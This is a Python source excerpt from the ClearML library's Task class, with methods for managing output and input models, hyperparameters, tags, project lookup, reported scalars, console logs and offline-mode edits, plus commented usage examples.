# type: (str, Optional[str], Optional[str], Optional[Sequence[str]]) -> ()
"""
Update the Task's output model. Use this method to update the output model when you have a local model URI,
for example, when the weights file is stored locally and you specify a ``file://path/to/file`` URI.
.. important::
This method only updates the model's metadata using the API. It does not upload any data.
:param model_uri: The URI of the updated model weights file.
:type model_uri: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(
uri=model_uri, task_id=self.id, name=name, comment=comment, tags=tags)
def update_output_model_and_upload(
self,
model_file, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
async_enable=False, # type: bool
cb=None, # type: Optional[Callable[[Optional[bool]], bool]]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
then ClearML updates the model object associated with the Task with an API call. The API call uses the URI
of the uploaded file, and other values provided by additional arguments.
:param str model_file: The path to the updated model weights file.
:param str name: The updated model name. (Optional)
:param str comment: The updated model description. (Optional)
:param list tags: The updated model tags. (Optional)
:param bool async_enable: Request asynchronous upload
- ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread.
- ``False`` - The API call blocks until the upload completes, and the API call updating the model returns.
(default)
:param callable cb: Asynchronous callback. If ``async_enable`` is set to ``True``,
this is a callback that is invoked once the asynchronous upload and update complete.
:param int iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``,
this is the expected URI, as the upload is probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
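# Illustrative sketch (not part of the original class): a possible (assumed) use of the two
# output-model helpers above. The URIs, file paths and metadata below are placeholders.
#
#   # metadata-only update for an already-uploaded weights file:
#   task.update_output_model('s3://bucket/models/model.pt', name='resnet50')
#
#   # upload a local weights file and update the model in one blocking call:
#   uri = task.update_output_model_and_upload(
#       'checkpoints/model.pt', name='resnet50', comment='epoch 10', async_enable=False)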
def _conditionally_start_task(self):
# type: () -> ()
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
# type: (str, Optional[str], bool, bool) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name. The name is used to locate an existing model in the **ClearML Server**
(backend). If ``model_id`` is not specified, then ``model_name`` must be specified.
:param update_task_design: Update the Task's design
- ``True`` - ClearML copies the Task's model design from the input model.
- ``False`` - ClearML does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration
- ``True`` - ClearML copies the Task's label enumeration from the input model.
- ``False`` - ClearML does not copy the Task's label enumeration from the input model.
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
self.reload()
# store model id
self.data.execution.model = model_id
# Auto populate input field from model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
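# Illustrative sketch (not part of the original class): set_input_model() accepts either a model
# id or a model name (exactly one is required). The id and name below are placeholders.
#
#   task.set_input_model(model_id='d7a038005e9f4b0d9b21f4b6a8a9e6c1')
#   # or, look the model up by name (only "ready"/published models are matched):
#   task.set_input_model(model_name='resnet50 baseline', update_task_labels=False)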
def get_parameters(self, backwards_compatibility=True):
# type: (bool) -> (Optional[dict])
"""
Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not
support parameter descriptions (the result is a dictionary of key-value pairs).
Notice the returned parameter dict is flat:
i.e. {'Args/param': 'value'} is the argument "param" from section "Args"
:param backwards_compatibility: If True (default) parameters without section name
(API version < 2.9, clearml-server < 0.16) will be at dict root level.
If False, parameters without section name, will be nested under "Args/" key.
:return: dict of the task parameters, all flattened to key/value.
Different sections with key prefix "section/"
"""
if not Session.check_min_api_version('2.9'):
return self._get_task_property('execution.parameters')
# The API makes sure we get old parameters with type 'legacy' at the top level (instead of nested in Args)
parameters = dict()
hyperparams = self._get_task_property('hyperparams') or {}
if not backwards_compatibility:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
parameters['{}/{}'.format(section, key)] = section_param.value
else:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ):
parameters['{}'.format(key)] = section_param.value
else:
parameters['{}/{}'.format(section, key)] = section_param.value
return parameters
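# Illustrative sketch (not part of the original class): the flat "Section/name" convention used
# by get_parameters()/set_parameters(). The keys and values below are placeholders.
#
#   params = task.get_parameters()           # e.g. {'Args/batch_size': '32', 'Args/lr': '0.001'}
#   batch_size = int(params.get('Args/batch_size', 32))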
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
return self._set_parameters(*args, __update=False, **kwargs)
def _set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
def stringify(value):
# return empty string if value is None
if value is None:
return ""
str_value = str(value)
if isinstance(value, (tuple, list, dict)) and 'None' in re.split(r'[ ,\[\]{}()]', str_value):
# If we have None in the string we have to use json to replace it with null,
# otherwise we end up with None as string when running remotely
try:
str_json = json.dumps(value)
# verify we actually have a null in the string, otherwise prefer the str cast
# This is because we prefer to have \' as in str and not \" used in json
if 'null' in re.split(r'[ ,\[\]{}()]', str_json):
return str_json
except TypeError:
# if we somehow failed to json serialize, revert to previous std casting
pass
return str_value
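# Illustrative sketch (not part of the original code): what the stringify() helper above does
# with containers that hold None. The literals are examples only.
#
#   stringify([1, None, 3])   -> '[1, null, 3]'   (JSON, so None survives a round trip remotely)
#   stringify([1, 2, 3])      -> '[1, 2, 3]'      (plain str(); no None, so the str cast is preferred)
#   stringify(None)           -> ''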
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
prefix = kwargs.pop('__parameters_prefix', None)
descriptions = kwargs.pop('__parameters_descriptions', None) or dict()
params_types = kwargs.pop('__parameters_types', None) or dict()
update = kwargs.pop('__update', False)
# new parameters dict
new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
new_parameters.update(kwargs)
if prefix:
prefix = prefix.strip('/')
new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items())
# verify parameters type:
not_allowed = {
k: type(v).__name__
for k, v in new_parameters.items()
if not verify_basic_type(v, self._parameters_allowed_types)
}
if not_allowed:
self.log.warning(
"Skipping parameter: {}, only builtin types are supported ({})".format(
', '.join('%s[%s]' % p for p in not_allowed.items()),
', '.join(t.__name__ for t in self._parameters_allowed_types))
)
new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed}
use_hyperparams = Session.check_min_api_version('2.9')
with self._edit_lock:
self.reload()
# if we have a specific prefix, we are using hyperparameters, and this is a set (not an update),
# overwrite only the prefixed section and leave the rest as is.
if not update and prefix:
parameters = copy(self.get_parameters() or {})
parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/'))
elif update:
parameters = copy(self.get_parameters() or {})
else:
parameters = dict()
parameters.update(new_parameters)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: stringify(v) for k, v in parameters.items()}
if use_hyperparams:
# build nested dict from flat parameters dict:
org_hyperparams = self.data.hyperparams or {}
hyperparams = dict()
# if the task is a legacy task, we should put everything back under Args/key with legacy type
legacy_name = self._legacy_parameters_section_name
org_legacy_section = org_hyperparams.get(legacy_name, dict())
for k, v in parameters.items():
# legacy variable
if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy':
section = hyperparams.get(legacy_name, dict())
section[k] = copy(org_legacy_section[k])
section[k].value = str(v) if v else v
description = descriptions.get(k)
if description:
section[k].description = description
hyperparams[legacy_name] = section
continue
org_k = k
if '/' not in k:
k = '{}/{}'.format(self._default_configuration_section_name, k)
section_name, key = k.split('/', 1)
section = hyperparams.get(section_name, dict())
org_param = org_hyperparams.get(section_name, dict()).get(key, tasks.ParamsItem())
param_type = params_types[org_k] if org_k in params_types else org_param.type
if param_type and not isinstance(param_type, str):
param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type)
section[key] = tasks.ParamsItem(
section=section_name, name=key,
value=str(v) if v else v,
description=descriptions[org_k] if org_k in descriptions else org_param.description,
type=param_type,
)
hyperparams[section_name] = section
self._edit(hyperparams=hyperparams)
self.data.hyperparams = hyperparams
else:
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None, value_type=None):
# type: (str, str, Optional[str], Optional[Any]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
:param value_type: The type of the parameters (cast to string and store)
"""
if not Session.check_min_api_version('2.9'):
# not supported yet
description = None
value_type = None
self._set_parameters(
{name: value}, __update=True,
__parameters_descriptions={name: description},
__parameters_types={name: value_type}
)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def delete_parameter(self, name):
# type: (str) -> bool
"""
Delete a parameter by its full name, Section/name.
:param name: Parameter name in full, i.e. Section/name. For example, 'Args/batch_size'
:return: True if the parameter was deleted successfully
"""
if not Session.check_min_api_version('2.9'):
raise ValueError("Delete hyper parameter is not supported by your clearml-server, "
"upgrade to the latest version")
with self._edit_lock:
paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1])
res = self.send(tasks.DeleteHyperParamsRequest(
task=self.id, hyperparams=[paramkey]), raise_on_errors=False)
self.reload()
return res.ok()
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self._set_parameters(*args, __update=True, **kwargs)
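# Illustrative sketch (not part of the original class): set_parameters() replaces the whole flat
# parameter dict, while update_parameters() merges into it. Keys and values are placeholders.
#
#   task.set_parameters({'Args/lr': 0.001, 'Args/batch_size': 32})   # replace all parameters
#   task.update_parameters({'Args/lr': 0.0005})                      # merge: batch_size is kept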
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
# type: (str) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely the call is ignored
"""
if not self.running_locally():
return
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> ()
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts to be a list of tasks.Artifact objects')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
if Session.check_min_api_version('2.9'):
configuration = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
configuration[self._default_configuration_section_name] = tasks.ConfigurationItem(
name=self._default_configuration_section_name, value=str(design))
self._edit(configuration=configuration)
else:
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as blob of text.
:return: The model configuration as blob of text.
"""
if Session.check_min_api_version('2.9'):
design = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
if design:
design = design.get(sorted(design.keys())[0]).value or ''
else:
design = self._get_task_property(
"execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
# type: (str) -> ()
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id=None, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
# if running remotely and we are the main task, skip setting ourselves.
if self._is_remote_main_task():
return
if not project_id:
assert isinstance(project_name, six.string_types)
res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False)
if not res or not res.response or not res.response.projects or len(res.response.projects) != 1:
return False
project_id = res.response.projects[0].id
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.parent
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def set_task_type(self, task_type):
# type: (Union[str, Task.TaskTypes]) -> ()
"""
Set the task_type for the Task.
:param task_type: The task_type of the Task (see optional values in TaskTypes).
:type task_type: str or TaskTypes
"""
if not isinstance(task_type, self.TaskTypes):
task_type = self.TaskTypes(task_type)
self._set_task_property("task_type", str(task_type))
self._edit(type=task_type)
def set_archived(self, archive):
# type: (bool) -> ()
"""
Archive the Task or remove it from the archived folder.
:param archive: If True archive the Task, If False make sure it is removed from the archived folder
"""
with self._edit_lock:
system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \
if archive else list(set(self.get_system_tags()) - {self.archived_tag})
self.set_system_tags(system_tags)
def get_archived(self):
# type: () -> bool
"""
Return the Archive state of the Task
:return: If True the Task is archived, otherwise it is not.
"""
return self.archived_tag in self.get_system_tags()
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
.. code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
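# Illustrative sketch (not part of the original class): when resuming from a checkpoint, the
# (assumed) pattern is to set the offset once before reporting resumes, so scalars and plots
# continue at the right x-axis position.
#
#   start_iteration = 100000                     # e.g. read from the checkpoint being loaded
#   task.set_initial_iteration(start_iteration)
#   assert task.get_initial_iteration() == start_iteration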
def get_status(self):
# type: () -> str
"""
Return the Task status without refreshing the entire Task object (only the status property).
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached; every call retrieves all the scalar reports from the back-end.
If the Task has many reported scalars, the call might take a long time to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0 returning all scalars.
With a sample limit, scalar values are averaged within each sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
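# Illustrative sketch (not part of the original class): walking the nested dict returned by
# get_reported_scalars(). Titles and series are whatever was reported; no names are assumed here.
#
#   scalars = task.get_reported_scalars(max_samples=0, x_axis='iter')
#   for title, series_dict in scalars.items():
#       for series, points in series_dict.items():
#           print(title, series, len(points['x']), 'samples, last y =', points['y'][-1])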
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
        Return a list of console outputs reported by the Task. The retrieved outputs are the most recent console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
"""
if Session.check_min_api_version('2.9'):
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
navigate_earlier=True,
batch_size=number_of_reports)
else:
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports)
res = self.send(request)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
def get_configuration_object(self, name):
# type: (str) -> Optional[str]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a text blob (unconstrained text string)
return None if configuration name is not valid
"""
return self._get_configuration_text(name)
def set_configuration_object(self, name, config_text=None, description=None, config_type=None):
# type: (str, Optional[str], Optional[str], Optional[str]) -> None
"""
Set the Task's configuration object as a blob of text.
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:param config_text: configuration as a blob of text (unconstrained text string)
usually the content of a configuration file of a sort
:param str description: Configuration section description
:param str config_type: Optional configuration format type
"""
return self._set_configuration(
name=name, description=description, config_type=config_type, config_text=config_text)
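    # Hypothetical round-trip sketch (assumes ``task`` is an instance of this class;
    # the section name and content are illustrative):
    #
    #     task.set_configuration_object('my_section', config_text='key: value', config_type='yaml')
    #     text = task.get_configuration_object('my_section')  # 'key: value', or None if the section is missing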
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@classmethod
def get_project_id(cls, project_name):
# type: (str) -> Optional[str]
"""
        Return the project unique ID (str).
        If more than one project matches the project_name, return the most recently updated project.
        If no project matches the requested name, return None.
:return: Project unique ID (str), or None if no project was found.
"""
assert project_name
assert isinstance(project_name, str)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)),
raise_on_errors=False)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()).id for p in res.response.projects][0]
return None
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``clearml-agent`` is not executing it)
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> ()
"""
Force the adding of a package to the requirements list. If ``package_version`` is not specified, use the
installed package version, if found.
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
cls._force_requirements[package_name] = package_version
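    # Hypothetical usage sketch (the package name and version are illustrative):
    #
    #     Task.add_requirements('tensorflow', '2.4.0')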
def _get_models(self, model_type='output'):
# type: (str) -> Sequence[Model]
# model_type is either 'output' or 'input'
model_type = model_type.lower().strip()
assert model_type == 'output' or model_type == 'input'
if model_type == 'input':
regex = r'((?i)(Using model id: )(\w+)?)'
compiled = re.compile(regex)
ids = [i[-1] for i in re.findall(compiled, self.comment)] + (
[self.input_model_id] if self.input_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
in_model = []
for i in ids:
m = TrainsModel(model_id=i)
# noinspection PyBroadException
try:
                    # make sure the model is valid
# noinspection PyProtectedMember
m._get_model_data()
in_model.append(m)
except Exception:
pass
return in_model
else:
res = self.send(
models.GetAllRequest(
task=[self.id],
order_by=['created'],
only_fields=['id']
)
)
if not res.response.models:
return []
ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
return [TrainsModel(model_id=i) for i in ids]
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.9'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict())
elif Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _is_remote_main_task(self):
# type: () -> bool
"""
:return: return True if running remotely and this Task is the registered main task
"""
return running_remotely() and get_remote_task_id() == self.id
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
            # Since we are using forced update, make sure the task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
